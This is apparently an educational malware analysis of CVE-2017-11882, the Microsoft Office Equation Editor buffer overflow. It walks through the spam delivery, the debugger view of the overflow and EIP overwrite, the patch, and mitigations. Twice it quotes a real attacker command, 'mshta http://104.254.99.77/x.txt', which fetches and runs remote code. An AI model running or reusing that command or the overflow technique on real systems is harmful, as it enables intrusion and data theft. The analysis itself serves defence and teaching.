- Age: 17 year old vulnerability
- What is it: Run arbitrary code remotely without user interaction
- Why it works: Buffer overflow vulnerability inside equation editor (EQUEDT32.exe)
- Who has been affected: Users who installed
- Microsoft Office 2007 Service Pack 3
- Microsoft Office 2010 Service Pack 2
- Microsoft Office 2013 Service Pack 1
- Microsoft Office 2016
- CVSS:
- The Common Vulnerability Scoring System
- The score is 7.8 (high)
- Really dangerous & should be fixed ASAP
Figure 1: CVSS score [1]
- A spam email
- An attachment
- A .doc file in Rich Text Format (RTF)
- Microsoft Office will automatically open it
Figure 2: Spam Email [2]
It is an advanced monitoring tool for Windows.
It is used to monitor and display all the activities of file system in real-time.
- Unexpected operation named 'EQNEDT32.EXE'
- Command line has been called
- (Very like) a malicious host - 'mshta http://104.254.99.77/x.txt'
Figure 3: Processes List [3]
It is a web vulnerability scanner.
It is a set of tools used for penetration testing of web applications.
- Unexpected 'GET' request
- (Very like) a malicious host - 'mshta http://104.254.99.77/x.txt'
Figure 4: Get request [3]
Here microsoft word will load up and read and compile the stuff inside.
Everyone used the equation editor before, to create the nice look equations.
However, the equation editor is another individual program and Microsoft Word invokes its own process.
In this case, everything inside the equation editor can skip all Microsoft protection bubbles.
Before overflow EAX save the length of font name which is 16 bytes (Hex:00000010).
And the detail inside the font name registers is “TIMES NEW ROMAN”.
Figure 5: Debuger screenshot 1 [3]
After overflow, EAX pointed to 0012F350 and overflowed all other registers. On memory 004115CF, it loads whatever is inside the ebp register and pushes into the EAX register. The ebp register is a two way pointer and linking between word document and equation editor. The hacker changed the ebp register value to 48 bytes and then it was loaded to the EAX register.
Figure 6: Debuger screenshot 2 [3]
Let now take a look at the 48 bytes detail inside the overflowed register beginning at address: 0012F350.
From address 0012F350 to 0012F360 32 bytes are saving the hacker's mshta link and it can send a get request to this link and download the malicious software.
Address: 0012F370 first 12 bytes are ‘20’ which are saving shell code inside but we cannot see it in detail through ASCii reader.
The final 4 bytes are ‘12 0C 43 00’ which is the new EIP register address that the hacker wants us to jump to in the next step.
Figure 7: Debuger screenshot 3 [3]
Here we can see at address: 00430C12 it call the Winexe program.
Figure 8: Debuger screenshot 4 [3]
From the code here we can see the Winexe execute at address 00430C12 and talk to the EAX register as it input.
In this case, inside the Winexe it will run shell code first, then send a get request to the hacker's link.
Figure 9: Debuger screenshot 5 [3]
Finally after everything executes and runs correctly, it will download the malicious software and hide in some specific hard finding place to continuously steal your personal information.
The best way to protect your machine from this vulnerability is patching. However, if you decide not to patch, a simple way to protect your machine is to disable EQUAEDT32.exe which is the equation editor that has the vulnerability. The following commands can update your registry to disable EQUAEDT32.exe. If you have an Office software running on a x64 machine, then you can use the second command, otherwise the first command is your choice. [4]
Figure 10: Update registry [4]
The official patching for CVE-2017-11882 was done in a Patch Tuesday update in November 2017. The patching was mainly done at function sub_0041160F. The difference of the patched function(left hand side) and the original function(right hand side) is shown below. The left top block shows that a boundary check is added. This line of code reset the counter register to 0x20 if it is larger than or equal to 0x21. The left bottom block added a buffer truncation. This code makes sure only 0x20 bytes are copied and zero-terminate. [5]
Figure 11: Official Patch [5]
- Don’t skip patches.
Simply patch or update the software can prevent an attack from happening. - Use a real-time anti-virus.
Using a anti-virus software can sometime be helpful. - Filter your email.
Block the type of document that you don't use.
Do not click on the link or a document that looks suspicious. - Keep track of your websites. Don’t enable online services or create online accounts just because of promotion.
[1]"NVD - CVE-2017-11882", Nvd.nist.gov, 2021. [Online]. Available: https://nvd.nist.gov/vuln/detail/CVE-2017-11882. [Accessed: 18- Mar- 2021].
[2]Blogs.quickheal.com, 2021. [Online]. Available: https://blogs.quickheal.com/wp-content/uploads/2018/02/Fig3.png. [Accessed: 18- Mar- 2021].
[3]C. Hardy, Stack Buffer Overflows - a primer on smashing the stack using CVE-2017-11882. 2021.
[4]C. Hardy, CVE-2017-11882 - 3 ways to perform technical analysis, 1 easy way to protect. 2021.
[5]L. Treiber, "Microsoft's Manual Binary Patch For CVE-2017-11882 Meets 0patch", Blog.0patch.com, 2021. [Online]. Available: https://blog.0patch.com/2017/11/official-patch-for-cve-2017-11882-meets.html. [Accessed: 18- Mar- 2021].
